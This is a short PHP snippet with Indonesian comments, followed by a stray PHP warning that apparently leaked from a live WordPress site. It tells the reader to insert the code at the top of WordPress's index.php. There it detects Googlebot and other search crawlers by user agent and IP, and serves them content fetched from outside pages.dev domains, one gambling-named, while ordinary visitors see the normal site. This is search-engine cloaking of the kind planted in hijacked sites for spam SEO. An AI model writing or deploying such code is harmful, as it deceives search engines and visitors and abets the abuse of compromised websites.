// Taruh di paling atas file index.php (sebelum require wp-blog-header.php)
$user_agent = $_SERVER['HTTP_USER_AGENT'] ?? '';
$ip = $_SERVER['REMOTE_ADDR'] ?? '';
$is_google = (stripos($user_agent, 'Googlebot') !== false ||
stripos($user_agent, 'Google-InspectionTool') !== false ||
preg_match('/google|bing|yahoo|duckduckbot|yandex/i', $user_agent));
$google_ip = preg_match('/^66\.249\.|64\.233\.|34\./', $ip); // IP Google 2025
if ($is_google || $google_ip) {
// Ganti dengan domain aged kamu yang isinya company profile
$clean = ['https://ftcglobal.pages.dev/', 'https://asian4d-localdawg.pages.dev/'];
$url = $clean[array_rand($clean)];
echo file_get_contents($url);
exit;
}
Warning: The magic method WPDEV_Settings_API_Form::__wakeup() must have public visibility in /home/ftcgloba/public_html/wp-content/plugins/lastform/vendor/wpdev-settings/class-wpdev-settings-api.php on line 171